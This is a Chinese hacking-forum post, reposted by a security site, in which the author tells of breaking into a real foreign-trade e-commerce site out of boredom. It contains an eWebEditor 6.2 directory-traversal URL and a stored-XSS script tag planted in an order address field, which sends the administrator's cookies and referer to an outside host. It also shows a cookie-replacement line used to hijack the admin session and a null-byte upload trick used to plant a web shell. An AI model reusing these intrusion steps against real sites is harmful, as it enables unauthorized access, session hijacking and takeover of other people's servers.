无聊,铞一外贸商城,ASP,有注入,铞出账号密码,直觉MD5加盐,查了,铞不出明文,后台也铞不出.有eweb6.2,可以列文件但列不出目录,求高人指点.
列文件:
1
|
/editor/asp/browse.asp?action=file&type=file&dir=.....///&style=sysweb&cusdir=&foldertype=upload&returnflag
|
思路:打算GOOGLE日一下同程序的站,拿源码,继续铞目标站.
找到一个程序大致一样的网站,铞之…eweb6.2列一下文件,狗运到,有程序备份在网站根目录.
下载回来以后,看了一下后台,都是蛮疯狂的目录名.目标站的后台扫描基本也放弃了.看了一下源码,发现后台是单纯的session验证admin是否为空.有一个上传,应该能直接%00截断上传,思路也大致出来了.
思路:优先挖掘能跨到后台的存储型XSS,盗取referer 和 cookies . 等管理员被XSS,应该就能记录后台地址,然后立刻趁管理员还没退出,SESSION还没挂掉,立刻替换他的COOKIE到自己那,上传得SHELL
找呀找,找呀找,找到订单提交的位置可以XSS到后台,管理员查看订单时就能触发.立马把前面的源码架设起来,测试一下.
测试没问题,马上铞目标站.马上填好订单,提交.address填上
<script src=https://static-js.b0.upaiyun.com/wp-content/uploads/auto_save_image/2012/09/1043076fI.jpg>
把盗referer和cookies的脚本传到空间. 剩下就是等管理员上线,每日每夜地刷新着TXT,等待cookies的来临,终于来了. 马上打开后台地址www.91ri.org /seyshomekjers/来到登陆界面,在URL上写,下面不是写错了
1
|
javsript:docment.cokie=“ASPSESSIONIDCSSBDTST=NCCNEMLAJLKCIPNOFOADMNNH”;
|
求神拜佛SESSION不要挂了;然后直接连接www.xxx.com/seyshomekjers/upload_pic.asp,没有跳转到登陆页,证明OK了,
抓包,上传,%00,上传不了ASA,ASP,不知道是怎么回事,应该是防火墙还是啥.上传CER成功解析,闪人,这些就不截图了.
其实大牛看了,应该觉得绕了远路了,没亮点,勿见怪.菜啊.
link:https://www.t00ls.net/thread-18438-1-2.html
91ri.org:简单的思路,10年的文章 拿出来分享一下 推荐一篇大神的xss文章《用xss平台沦陷百度投诉中心后台》希望大家喜欢。
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注名本站连接!
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号